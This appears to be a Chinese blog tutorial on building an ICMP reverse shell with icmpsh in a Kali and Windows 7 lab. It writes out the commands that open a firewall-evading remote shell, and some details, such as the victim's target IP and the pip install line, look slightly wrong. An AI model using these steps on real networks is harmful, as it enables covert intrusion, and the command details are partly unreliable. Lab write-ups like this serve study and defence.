内网渗透之 ICMP(icmpsh) 协议反弹Shell

简介

最常见的ICMP消息为Ping命令的回复,通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包)。

常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。

这里使用 icmpsh跨平台工具,python版本 < python3。

实验环境

kali:192.168.95.128

windows7:192.168.95.169

下载icmpsh

https://github.com/inquisb/icmpsh

git clone GitHub - bdamele/icmpsh: Simple reverse ICMP shell.git

安装impacket

c版本和python版本运行需要impacket库文件中的各种协议支持

pip2 install impacket

内网渗透之 ICMP(icmpsh) 协议反弹Shell_第1张图片

如果没有pip命令的话先安装pip

apt-get install pip

apt-get install pip2

建立icmp隧道

运行命令

python icmpsh_m.py 192.168.95.128 192.168.95.169

然后windows7下载icmpsh.exe文件运行

icmpsh.exe -t 192.168.95.169

内网渗透之 ICMP(icmpsh) 协议反弹Shell_第2张图片

但是这里会一直携带shell数据不停反弹,因为icmpsh工具要代替系统本身的ping命令的应答程序

所以需要输入如下命令来关闭本地系统的ICMP答应(要恢复系统答应,则设置为0),不然Shell的运行不稳定

sysctl -w net.ipv4.icmp_echo_ignore_all=1

内网渗透之 ICMP(icmpsh) 协议反弹Shell_第3张图片

 成功反弹会shell命令并运行命令

wirkshark抓取数据包查看

内网渗透之 ICMP(icmpsh) 协议反弹Shell_第4张图片

内网渗透之 ICMP(icmpsh) 协议反弹Shell_第5张图片

声明
提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或间接损失由使用者自行承担。


结语

去经历,然后去后悔;去做你想做的,去选择你所爱的,然后去泣不成声;就算满身痛楚,也不想为别人眼里的正确而活。

你可能感兴趣的:(安全)